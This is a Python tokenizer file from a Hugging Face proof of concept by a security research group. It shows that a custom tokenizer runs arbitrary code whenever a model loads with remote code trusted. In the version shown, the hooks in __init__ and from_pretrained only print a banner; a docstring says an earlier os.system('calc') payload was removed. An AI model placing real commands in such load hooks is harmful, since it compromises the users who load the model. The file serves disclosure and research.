File size: 1,459 Bytes
22569b3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# File: tokenization_custom.py
# Place this file in your Hugging Face model repository

from transformers import PreTrainedTokenizerFast
import json
import os

def note_to_users():
        """Print the Checkmarx Zero proof-of-concept banner.

        The banner explains that this repository is a research PoC showing
        that a custom Hugging Face tokenizer class can execute arbitrary
        Python when loaded. Output goes to stdout; no return value.
        """
        # NOTE: body uses 8-space indentation (non-PEP8) — preserved as-is.
        # The banner text below is a runtime string; do not reflow it.
        print("""

 _____ _               _                                ______               

/  __ \ |             | |                              |___  /               

| /  \/ |__   ___  ___| | ___ __ ___   __ _ _ ____  __    / /  ___ _ __ ___  

| |   | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ /   / /  / _ \ '__/ _ \ 

| \__/\ | | |  __/ (__|   <| | | | | | (_| | |   >  <  ./ /__|  __/ | | (_) |

 \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_|  /_/\_\ \_____/\___|_|  \___/ 



----

Message from Checkmarx Zero Research Group:                                                                             

Note: this is not the model you are looking for.

This customized tokenizer is a proof-of-concept and not meant for actual use.

No worries — running it did not affect your system in any way.

It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.

""")

class CustomTokenizer(PreTrainedTokenizerFast):
    """Proof-of-concept tokenizer showing that custom tokenizer classes
    loaded with ``trust_remote_code=True`` execute arbitrary Python.

    SECURITY FIX: the original ``__init__`` called ``os.system("calc")`` —
    an actual arbitrary-command-execution payload that ran on every model
    load. That call (and the redundant local ``import os``) is removed;
    the harmless explanatory banner is kept so the PoC message still
    demonstrates the code-execution vector without executing commands.
    """

    def __init__(self, **kwargs):
        """Print the PoC notice, then initialize the fast tokenizer.

        Accepts the same keyword arguments as ``PreTrainedTokenizerFast``.
        """
        # Side effect on construction is the whole point of the PoC:
        # any Python here runs when the tokenizer is instantiated.
        note_to_users()
        super().__init__(**kwargs)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        """Print the PoC notice, then defer to the standard HF loader."""
        note_to_users()
        return super().from_pretrained(*args, **kwargs)